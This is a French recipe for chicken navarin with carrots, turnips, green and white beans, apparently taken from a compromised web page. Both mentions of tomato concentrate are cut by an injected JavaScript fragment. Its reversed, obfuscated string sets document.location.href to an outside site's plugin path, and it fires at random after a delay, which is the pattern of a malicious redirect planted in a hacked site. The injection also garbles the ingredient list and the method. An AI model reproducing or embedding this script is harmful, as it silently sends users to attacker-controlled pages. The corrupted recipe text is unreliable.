NAVARIN DE POULET

NAVARIN DE POULET

Pour 4 Pers.

INGRÉDIENTS :

– 4 filets de poulet, coupés en gros cubes
– 4 carottes épluchées, en rondelles
– 125g de navets congelés
– 125g de haricots verts congelés
– 1 oignon émincé
– 1 gousse d’ail
– 3 CS concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate
– 1 petit bocal d’haricots blancs
– 2 CS persil haché congelé
– 1 bouillon cube de poule dégraissé
– huile d’olive
– sel/poivre


Faire revenir les oignons et l’ail dans un peu d’huile d’olive. Rajouter les morceaux de poulet et faire dorer.


Intégrer alors le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate et cuire 1 minute


Insérer les carottes, les navets, les haricots verts et faire cuire 5 minutes avec le couvercle.


Rajouter de l’eau à hauteur ainsi qu’un bouillon cube et cuire 20 minutes.


Mettre les haricots blancs rincés et égouttés. Cuire 10 minutes supplémentaires.


Rajouter le persil haché, assaisonner et servir dans des bols.

Bon appétit

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